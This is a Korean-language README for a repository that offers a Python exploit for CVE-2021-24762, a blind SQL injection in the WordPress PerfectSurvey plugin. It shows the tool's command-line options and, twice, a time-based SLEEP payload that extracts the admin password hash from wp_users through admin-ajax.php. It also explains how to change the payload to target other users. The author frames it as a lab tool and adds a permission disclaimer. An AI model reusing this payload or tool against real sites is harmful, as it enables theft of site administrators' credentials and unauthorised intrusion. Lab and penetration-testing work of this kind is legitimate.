
이 저장소는 CVE-2021-24762에 대한 익스플로잇을 보여줍니다. 기본 구성에서 관리자 비밀번호를 추출하는 블라인드 SQLi 익스플로잇입니다.
이 저장소는 CVE-2021-24762에 대한 익스플로잇을 보여줍니다. 기본 구성에서 관리자(admin) 비밀번호를 추출하는 블라인드 SQL 인젝션(Blind SQLi) 익스플로잇입니다.
랩 실습 중 PerfectSurvey 플러그인이 설치된 WordPress 기반 환경에서 SQL 취약점에 막혔습니다. 제가 찾은 유일한 PoC는 sqlmap 기반이었고, 제가 작업 중이던 랩에서는 제대로 작동하지 않았습니다(추가적인 문제가 많았습니다. 예: 애플리케이션이 404를 반환하거나, 타임아웃이 너무 크게 변동하거나, 기타 문제들). 그래서 이 랩을 공격하기 위해 이 도구를 만들었습니다.
____ _ ___ ____
/ ___| / \ |_ _| / ___|
| | / _ \ | | \___ \
| |___ / ___ \ | | __ ) |
\____|/_/ \_\ |___| |____/
CAIS - Inteligência em Cibersegurança
Exploit for: CVE-2021-24762
usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]
Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it
options:
-h, --help show this help message and exit
-u, --url URL Base URL (default: http://192.168.10.10)
-p, --path PATH path (default: /wp-admin/admin-ajax.php)
-d, --delay DELAY delay in seconds (default: 30)
-t, --timeout TIMEOUT
timeout in seconds (default: delay + 15)
-c, --charset CHARSET
charset to be used (default: alnum + ./$_-@)
-m, --max-len MAX_LEN
maximum length (default: 20)
-v, --verbose activates log debugging
Python 스크립트는 위의 매개변수를 전달받습니다. 전달되지 않은 경우 기본값으로 실행됩니다.
이상적으로는 최소한 URL을 전달해야 합니다. -u 또는 --url로 지정하세요. 다른 매개변수는 기본값으로도 동작할 것입니다.
기본 구성에서는 admin 사용자의 비밀번호 해시를 가져옵니다. 이 구성은 payload 변수의 user_login 값에 적용됩니다:
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"
다른 사용자의 해시를 찾아야 하는 경우, "0x61646d696e"(admin)을 필요에 따라 변경하세요.
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"제한된 사용 — 이 저장소는 윤리적이고 책임 있는 사용만을 위한 민감한 콘텐츠를 포함하고 있습니다. 테스트 대상 시스템 소유자의 서면 허가를 반드시 받아야 합니다. 이 범위를 벗어난 사용은 허용되지 않으며, 그 책임은 사용자에게 있습니다(감옥에 가고 싶으십니까?).
exploit_cve-2021-24762 — 익스플로잇.README.ME — 이 파일.2025-10-10 — c4cnm — Creation and initial modifications
GNU General Public License v3 (GPL)